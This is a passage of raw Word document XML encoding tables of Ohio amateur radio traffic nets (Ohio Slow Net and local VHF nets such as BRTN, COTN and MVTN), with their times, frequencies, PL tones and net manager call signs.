                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>3.590</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27F844FA" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>WB9LBI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="53F716F1" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57B18FA4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ohio Slow Net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1815" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51E06CB4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>6:00 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29B72556" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>3.53535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="722015F4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>N2LC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49380B91" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>All net frequencies plus or minus QRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620A8B9" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF57C07" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>OHIO LOCAL VHF TRAFFIC NETS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3E293" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="511" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2715"/>
        <w:gridCol w:w="2445"/>
        <w:gridCol w:w="2020"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="48762C79" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5337E68F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>VHF NETS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2294EEE4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>NET TIMES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="469D6CBB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>FREQUENCY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20611BDA" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>NET MANAGERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="5B18C8A0" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7894F339" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>BRTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0543C6AD" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9:30 PM DAILY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14297CCB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">145.230 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">PL  110.9 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16A53617" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>W8DJG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="2C706736" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60D58BC6" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> COTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B60091C" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">7:15 PM DAILY </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E4A83BD" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 146.970  PL  123.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BACBA34" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> KD8TTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="7BCB8F42" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F344214" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>MVTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42D7F3B3" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>7:00 PM Mon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71ACEC5F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>146.640</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11F4EA42" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">  KC8HTP </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="4EA74A99" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B43DA67" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
